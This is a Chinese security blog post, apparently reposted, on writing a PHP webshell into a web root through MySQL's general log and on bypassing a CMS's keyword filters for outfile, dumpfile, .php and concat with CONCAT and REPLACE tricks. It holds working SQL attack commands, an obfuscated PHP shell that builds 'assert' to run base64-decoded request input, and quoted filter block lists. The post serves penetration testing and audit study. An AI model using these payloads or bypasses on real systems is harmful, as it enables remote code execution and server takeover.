SQL语句利用日志写shell及相关绕过
电子说
描述
0x01 基本原理
在能够写SQL语句的地方,outfile、dumpfile、drop database等都被禁止,一般进行SQL注入来getshell或删库的方式行不通了。
但是如果MySQL是root用户启动的,那么可以进行如下利用:
show variables like '%general%'; #查看配置 set global general_log = on; #开启general log模式 set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址 select '' #写入shell
SQL查询免杀shell的语句(参考:SQL语句利用日志写shell):
SELECT "'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"
0x02 Bypass案例
这个案例虽然鸡肋,但是思路还可以。
过滤 .php
代码审计某CMS时,看到一处写SQL语句的地方,此处之前报过漏洞,修复方案是过滤了outfile、dumpfile、drop database等,此外还过滤了.php字符串,为的就是防住SQL语句日志写shell:
if(stristr($sql, 'outfile')){
$str = 'ERROR : 检测到非法字符 “outfile”!';
break;
}
if(stristr($sql, 'dumpfile')){
$str = 'ERROR : 检测到非法字符 “dumpfile”!';
break;
}
if(stristr($sql, '.php')){
$str = 'ERROR : 检测到非法字符 “.php” !';
break;
}
if(preg_match("/^drop(.*)database/i", $sql)){
$str = 'ERROR : 不允许删除数据库!';
break;
}
这里直接写上述的SQL语句肯定是不行的,因为set global general_log_file = '/var/www/html/1.php';的.php会被过滤掉。
这里只是针对字符串的检测,可以用字符串拼接的方式Bypass,这里可以使用SQL语句中的concat家族系列函数来实现字符串拼接来Bypass:
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file =CONCAT("/var/www/html/1.","php");
select ''; #写入shell
过滤 .php和concat
在这次报过的漏洞之后,CMS厂商修改了这个洞,就是添加了对concat的字符串过滤,这样concat家族系列函数就使不上了。
if(stristr($sql, 'outfile')){
$str = 'ERROR : 检测到非法字符 “outfile”!';
break;
}
if(stristr($sql, 'dumpfile')){
$str = 'ERROR : 检测到非法字符 “dumpfile”!';
break;
}
if(stristr($sql, '.php')){
$str = 'ERROR : 检测到非法字符 “.php” !';
break;
}
if(stristr($sql, 'concat')){
$str = 'ERROR : 检测到非法字符 “concat” !';
break;
}
if(preg_match("/^drop(.*)database/i", $sql)){
$str = 'ERROR : 不允许删除数据库!';
break;
}
使用concat进行字符串拼接的方式没法绕过了,但是除了字符串拼接,我们还能使用字符串替换的操作来绕过:
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file =REPLACE("/var/www/html/1.jpg","jpg","php");
select ''; #写入shell
过滤 .php、concat和replace
CMS厂商收到新的绕过漏洞报告后,又进行新一轮的修复,过滤了replace:
if(stristr($sql, 'outfile')){
$str = 'ERROR : 检测到非法字符 “outfile”!';
break;
}
if(stristr($sql, 'dumpfile')){
$str = 'ERROR : 检测到非法字符 “dumpfile”!';
break;
}
if(stristr($sql, '.php')){
$str = 'ERROR : 检测到非法字符 “.php” !';
break;
}
if(stristr($sql, 'concat')){
$str = 'ERROR : 检测到非法字符 “concat” !';
break;
}
if(stripos($sql, 'replace')){
$str = 'ERROR : 检测到非法字符 “replace” !';
break;
}
if(preg_match("/^drop(.*)database/i", $sql)){
$str = 'ERROR : 不允许删除数据库!';
break;
}
字符串拼接和替换都不能成功进行利用了,还有啥办法不?
当然还有新的Bypass方法哈哈。
作者:Mi1k7ea
菜鸟学安全
-
SQL语句的两种嵌套方式2019-05-23 0
-
SQL语句生成器2009-06-12 0
-
关于labview中的SQL语句写法2013-01-05 0
-
区分SQL语句与主语言语句2021-10-28 0
-
为什么要动态sql语句?2021-12-20 0
-
shell流程控制语句的相关资料分享2021-12-22 0
-
嵌入式SQL语句与主语言之间的通信2021-12-22 0
-
数据库SQL语句电子教程2011-07-14 833
-
如何使用navicat或PHPMySQLAdmin导入SQL语句2018-04-10 654
-
如何使用SQL修复语句程序说明2019-10-31 554
-
嵌入式SQL语句2021-10-21 438
-
sql server执行os-shell2022-10-24 1612
-
利用ChatGPT通过Shell脚本来实现日志分析2023-04-07 2556
-
sql查询语句大全及实例2023-11-17 678
-
oracle执行sql查询语句的步骤是什么2023-12-06 432
全部0条评论
快来发表一下你的评论吧 !
